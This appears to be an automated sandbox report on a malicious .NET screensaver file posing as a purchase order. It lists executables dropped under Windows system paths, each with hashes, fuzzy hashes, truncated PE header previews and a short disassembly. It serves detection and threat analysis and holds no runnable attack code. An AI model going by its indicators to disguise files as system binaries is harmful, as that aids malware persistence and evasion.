                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z...z...z.......z.....z.....z...{...z.......z.....z.....z.....z.Rich..z.................PE..d...T.[J..........".................L........................................................................................................!..d....P.......@......................p...8.......................................\.... ..8............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc........P....... ..............@..@.reloc...P...`...@...$..............@.....[J0.....[J=...+.[JH.....[JR...+.[JH...........KERNEL32.dll.msvcrt.dll.NTDLL.DLL.ole32.dll.............................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\System32\ieetwcollector.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1244160
                                                                                                                                                                                                                                                                        Entropy (8bit):5.190608529759698
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:tjRpNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:bpNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:BF5F5556930D8CEF7BBAC46115910CF1
                                                                                                                                                                                                                                                                        SHA1:E132A455EBDED39768AE1D5E928ED4823E3207B1
                                                                                                                                                                                                                                                                        SHA-256:71C6AED1D7F7F1A49FEC96016F34AA5D155E0D2DD53C9821C7BB4A1EB8E3BC2C
                                                                                                                                                                                                                                                                        SHA-512:129B0976642DF122AEC1323020D32FFC427A8CEE949CE5A59C1CF8465C7BADA8D6ADDB2F7241EDD0209A4844101EA2A7568038274CEC7D099893A3DB1F4A5DB6
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A.SK a.K a.K a....A a...." a....x a....@ a.K `.. a....G a....J a....J a.RichK a.........................PE..d....p.X.........."......p...n.................@.............................`......b..... .......... ......................................P...x...............\....................................................?..................H............................text...ho.......p.................. ..`.data....8...........t..............@....pdata..\...........................@..@.idata..............................@..@.rsrc...............................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\System32\msdtc.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1271296
                                                                                                                                                                                                                                                                        Entropy (8bit):5.144820736066312
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:FkyeXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:OyesqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:48149FCDFB3E1B695AD17C25A00F9901
                                                                                                                                                                                                                                                                        SHA1:932952DE83AC926A464FA56EEF6CAE7EC1094D4E
                                                                                                                                                                                                                                                                        SHA-256:3CAC62D1563A10BF1344125B62C90D63C3BA76AC20814664300963AFF0B95AEF
                                                                                                                                                                                                                                                                        SHA-512:84BD73C952CA91BD88739D3DC5B77B91081A6507A14E43ADFDB9A0883FB3F684D9180658AEEAACBFC41193D5C06C531D910025B6AD01FF09DCF71468EF4820A4
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........bUUJ.;.J.;.J.;.C{..H.;.C{..[.;.J.:...;.C{..^.;.C{..].;.C{..I.;.C{..K.;.C{..K.;.RichJ.;.........PE..d...Z.[J.........."............................@....................................U................@.................................................px......D...................P................................................................................text...z........................... ..`.data...x(..........................@....pdata..D...........................@..@.rsrc...px.......z..................@..@.reloc...P...p...@...&..............@.....[JX...+.[Je.....[Jo.....[Jy...+.[Je.....[J....+.[Je.....[J......[J....k.[J............KERNEL32.dll.NTDLL.DLL.ole32.dll.msvcrt.dll.MSDTCTM.dll.VERSION.dll.USER32.dll.ADVAPI32.dll.....................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\System32\msiexec.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1256960
                                                                                                                                                                                                                                                                        Entropy (8bit):5.194551495144131
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:981ONGp1EXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:KN1EsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:0B127B7A1AB570F72488585B52FA0F77
                                                                                                                                                                                                                                                                        SHA1:B2D38851B45F850EA8F6B5F8FD3A92B96C9C2C06
                                                                                                                                                                                                                                                                        SHA-256:90EC81B4E2D8D783757A173AB7E60C063713BBAE498512EBF767DF277E8D177E
                                                                                                                                                                                                                                                                        SHA-512:BE953D0A2F95A51BB20F4A4FFF44D11A2098EF4217DF3F2431F7FC05FAC0318783CEE214E1CAD9CE8DD73D6513AE151EB3E4F98BA3C2F2007D46F1A3F3094D2D
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.B.:.,.:.,.:.,.3...8.,.3...*.,.3...5.,.:.-...,.3...{.,.3...8.,...R.;.,.3...;.,.3...;.,.Rich:.,.........PE..d....H#X..........".................8t............................................................... ......................................X........... ...............................................................................P............................text............................... ..`.data....G.......2..................@....pdata..............................@..@.rsrc... ........ ..................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\System32\snmptrap.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1144320
                                                                                                                                                                                                                                                                        Entropy (8bit):5.031996802600273
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:uNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:uNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:BD9A4418F0BB9873B642B4914A4BCFC8
                                                                                                                                                                                                                                                                        SHA1:BD05749548D1E0E382FE148E668DAAB50EAE80EC
                                                                                                                                                                                                                                                                        SHA-256:9F5F1A009BF6848B59115EFCC550EB25C57C1296DBA8AACE3813DB8CF62FCA8F
                                                                                                                                                                                                                                                                        SHA-512:27FA8B28B60704F568DF334A778CE0AFBE2B022D1D7720C20E0EE106A6A454F4945D79917CBFB5B57C6A74B5F20F4500BF6281406335F3E12767939A712363B4
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................q.......`.......f...............v.......|.......a.......d.....Rich....................PE..d.....[J.........."......&...........&............................................................... ......................................$...d....`.......P..................................................................t.......`............................text....%.......&.................. ..`.data........@.......*..............@....pdata.......P.......,..............@..@.rsrc........`......................@..@.reloc...P...p...@...6..............@...k.[J8.....[JE...+.[JR.....[J\...+.[JR.....[Jg...........ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.msvcrt.dll.WS2_32.dll...............................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\System32\sppsvc.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4106240
                                                                                                                                                                                                                                                                        Entropy (8bit):7.321216791274316
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:badpFUx1nkQoqvUbvgXELEnAR0gXV/XB+7nZE1GhnuFnNeNMWo0CWgiV5omI05Ij:QFUxeecao3yudFnNEDHIedD527BWG
                                                                                                                                                                                                                                                                        MD5:272951EFDA32D39F15FB575BE1A1D9FF
                                                                                                                                                                                                                                                                        SHA1:33650D85812D5957AEC3C2247504C1F28D56D84F
                                                                                                                                                                                                                                                                        SHA-256:9A5432E832A71E1738313E3EF6534F3518CC39CD23E18C4368EED97A6791E933
                                                                                                                                                                                                                                                                        SHA-512:D58EC7D55A2F5B364B2D6A37F2B50DB45699BEED6F5F890992C7401A68D1F00BA95DE8B190C90FAAFBBC190F7814ACD95BFC12557AD060A124804DFCE90DC424
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%^..a?u^a?u^a?u^F..^c?u^hG.^e?u^hG.^.?u^hG.^n?u^a?t^&>u^hG.^6?u^hG.^T?u^F..^`?u^hG.^`?u^hG.^`?u^hG.^`?u^Richa?u^........................PE..d...d..L..........".......1.....................................CS P..........>.......>...............................................0.l....0.......5..%....4.<...................<.0.8...............................................0............................text...x.1.......1................. ..`.data....x...01..z..."1.............@....pdata..<.....4.......4.............@..@.rsrc....%....5..&....5.............@..@.reloc........5.......5.............@...U..LP......L]......Lg......L]...7..Lt......L]...n..L.......L]...,..L............ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.msvcrt.dll.RPCRT4.dll.ole32.dll.............................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\System32\vds.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1660928
                                                                                                                                                                                                                                                                        Entropy (8bit):5.605458384830612
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:9vMgzNciyYe13kvoUasqjnhMgeiCl7G0nehbGZpbD:RcibeUoUuDmg27RnWGj
                                                                                                                                                                                                                                                                        MD5:39BE2351CC35C279474F5941C10A602A
                                                                                                                                                                                                                                                                        SHA1:3D8DFCDD01EE8D1E5EBBB03CD08C603381FD64DC
                                                                                                                                                                                                                                                                        SHA-256:2DF73320BF2991F10E57BCBCD2BB559DFB4FE490F185BE444672EBC0E3E81E6E
                                                                                                                                                                                                                                                                        SHA-512:76AF94B1E197C8A9050A9B2B245E9D069FB03D72172D681A0F7F6109EE5B2F04F79DC0E0D8F3CB236C8862234C459AD3A7C340A0E2164023716878E8020903D7
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................................................Rich...........................PE..d... ..L.........."..........P......lT..............................................~t............... ...................................#.....D....@..........."..................P...........................................d...................................text............................... ..`.data...x...........................@....pdata...".......$..................@..@.rsrc........@......................@..@.reloc...P...P...@..................@......L ......L+...7..L5......L+...h..L@......L+......LH......Li......L.......L.......L.......L+......L.......L.......L;......Ld......L.......L.......L.......L.......L+......L.......L!......L+......LB......Le......L.......L.......L.......L.......L#...\..L0...5..L=......LJ......LV...........

                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WmiApSrv.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1328128
                                                                                                                                                                                                                                                                        Entropy (8bit):5.252436209883557
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:K/UpJVuYgsqjnhMgeiCl7G0nehbGZpbD:oU0YcDmg27RnWGj
                                                                                                                                                                                                                                                                        MD5:5315539A5EC2C8A5DB1CA9BE817282C9
                                                                                                                                                                                                                                                                        SHA1:FE07969FCB3FBEFEAC9EC59D3061828321BE06F5
                                                                                                                                                                                                                                                                        SHA-256:30DAC95B88C0285CFDBB527FAE388E3C5C4F40578583BD3466AD2D34810441AD
                                                                                                                                                                                                                                                                        SHA-512:3AA66F3C7059AA80C9A7807927662E6F65D057BA6A809D10656DB2A22D4402A6D23AF0D78642967AE747C151BEFC031F50FBD22AB448CECB71BEDEC31B8F67CA
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-...~...~...~...~...~......~......~......~......~...~...~......~......~.o~...~......~Rich...~........PE..d....-JX.........."..........N......0..........@.......................................... .......... .................................@%..0........ .. ...............................8...........................P............... ................................text...Z........................... ..`.rdata..............................@..@.data...............................@....pdata........... ..................@..@.rsrc... .... ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\System32\wbengine.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2083328
                                                                                                                                                                                                                                                                        Entropy (8bit):7.087820240619387
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:iLbYI4I0bVKBUhx8CRSrzQ8vbeKgSRpXxmDYeQeaUx7qE7YLDmg27RnWGj:SYZkBU6ZvCK/phm8eQN8WD527BWG
                                                                                                                                                                                                                                                                        MD5:FCD24DD63126C9B5BC420BF92FA39456
                                                                                                                                                                                                                                                                        SHA1:6FF6D87F99432D07982A0AF5A9945287D24C26BD
                                                                                                                                                                                                                                                                        SHA-256:F6EEF6D5B6207C0CE198AC1AC2141EC6ADFFCBCFAA2CFED4A76D8585A6409C89
                                                                                                                                                                                                                                                                        SHA-512:E4CB77C4288F3541C13519E104CC4DFB7D4F43B1E565640219775981F65685CFAD51D0C146586C6C3DADC7762F75269ACB521E88AA744DF4301418FCD8E6CF80
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8..|...|...|...u.4.~...u.%.w...u.2.c...|...~..u.".e...u.+.....u.3.}...u.5.}...u.0.}...Rich|...........................PE..d...Q..L.........."......8..........H........................................ ...................... ...............................B......X...@...............................................................................t....................................text....6.......8.................. ..`.data....-...P.......>..............@....pdata...............L..............@..@.rsrc...............................@..@.reloc....... ......................@...U..L.......L.......L.......L.......L....7..L.......L.......L....,..L....0..L....n..L.......L.......L.......L.......L)......L4...1..LA......LM......LX...q..Le...........ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.RPCRT4.dll.VSSAPI.DLL.SETUPAPI.dll.NETA

                                                                                                                                                                                                                                                                        C:\Windows\ehome\ehrecvr.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1276416
                                                                                                                                                                                                                                                                        Entropy (8bit):6.995436927641597
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:VGne3OZEIOLMCldIgbRsqjnhMgeiCl7G0nehbGZpbD:XeZizdIgblDmg27RnWGj
                                                                                                                                                                                                                                                                        MD5:045A70B9D4D84B036CE87DE912F44EAD
                                                                                                                                                                                                                                                                        SHA1:F14251394E9706344192D03DDFD69C8784BFAAAB
                                                                                                                                                                                                                                                                        SHA-256:ED8AAF97645A69DB141EA9DD72A8CB3FAC132545B559DF4505ABA400A9E33628
                                                                                                                                                                                                                                                                        SHA-512:4BCA713A55B7A75F87754F55BDD2D8B3C631B7A30A0E74138C399C5336B040F1BEC411145A97A7C38D2112A18BEAA408697C957CFC3AA578C284279C0287A529
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X..9...9...9...A8..9...A)..9...A>..9...9...8...A...9...A'..9...A?..9...A9..9...A<..9..Rich.9..........PE..d......L..........".................4G.........@.....................................W............... ..............................dm......do..........`....`...K...................'..8............................................0..p............................text...h........................... ..`.rdata.......0......................@..@.data...l....@.......(..............@....pdata...K...`...L...:..............@..@.rsrc...`...........................@..@.reloc..............................@...U..Lx......L.......L.......L....7..L.......L....,..L....0..L.......L.......L.......L.......L.......L....................ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.SHLWAPI.dll.VERSION.dll.ehTrace.dll.SHELL32.dll.slc.dll........

                                                                                                                                                                                                                                                                        C:\Windows\ehome\ehsched.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1256960
                                                                                                                                                                                                                                                                        Entropy (8bit):5.172280865294199
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:mwXAwhxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:BQwhxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:0D46082BE032D7DA3EE657EA6CE0C32D
                                                                                                                                                                                                                                                                        SHA1:30BB92B570B4F0C840525E4CBDE428AAEC982583
                                                                                                                                                                                                                                                                        SHA-256:F8833E96FEED9AB30378132C115C7FCD5C2FE854B2D9BBF921E09A9089C27C5A
                                                                                                                                                                                                                                                                        SHA-512:B02D62340A7239E51B627805B911AF27963CC44A7D0EB642E7765779C344E5306EDD2B0041B21144A97FBF3DE9CF21CEC6F6C235F65DC30412F69AE07E5973E4
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... Z..N...N...N.......N.......N.......N...O.u.N.......N.......N.......N.......N.Rich..N.........................PE..d...5.[J..........".................L?.........@.....................................6............... .................................................p............................+..8............................................0...............................text...l........................... ..`.rdata.......0....... ..............@..@.data...............................@....pdata..............................@..@.rsrc...p...........................@..@.reloc...P...0...@..................@...k.[JP.....[J]...+.[Jj.....[Jt.....[J....+.[Jj.....[J......[J....................ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.slc.dll........................................................................................

                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):7.867365277392532
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                                                        File name:PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5:ac9d898648d7b851bbccb6f6028d45c6
                                                                                                                                                                                                                                                                        SHA1:82379e0b59f9a08c7196897a09be3ae859ec498a
                                                                                                                                                                                                                                                                        SHA256:6f9d6ab9fccd1087337ed8328407e5918bd3e2cddef4e4c4b56b067e956ac0d2
                                                                                                                                                                                                                                                                        SHA512:fc705a48e8fa764160cd021f25e0dde73fcbbeebf0cfffbe572317c163cd0946a39a4d6c075d39e5dcbedbf86c74bed978534004c3b4a1b66e311752aa102bbd
                                                                                                                                                                                                                                                                        SSDEEP:24576:rbJN+UVsa/olfwDPFB1Oj4eg9CQA1S092Txy0QEII2vWmexiq4VzGQ1IZTlNdSwq:X3+UfWwDPfkGCRUTs0QEI6TxiqCGKoF0
                                                                                                                                                                                                                                                                        TLSH:816501C02B29B711DDBC7934C52AEDB862741E38B010B9E26EED2B5776CA1136E1DF05
                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b..g..............0..b..........*.... ........@.. ....................................@................................

                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                        Icon Hash:0000000000000000

                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Entrypoint:0x57802a
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x67870B62 [Wed Jan 15 01:12:02 2025 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                                                                                                                        lodsd
                                                                                                                                                                                                                                                                        fiadd word ptr [eax]
                                                                                                                                                                                                                                                                        add bh, ch
                                                                                                                                                                                                                                                                        mov esi, CAFE0000h
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        mov esi, 000000BAh
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x177fd80x4f.text
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x17a0000x126c.rsrc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x17c0000xc.reloc
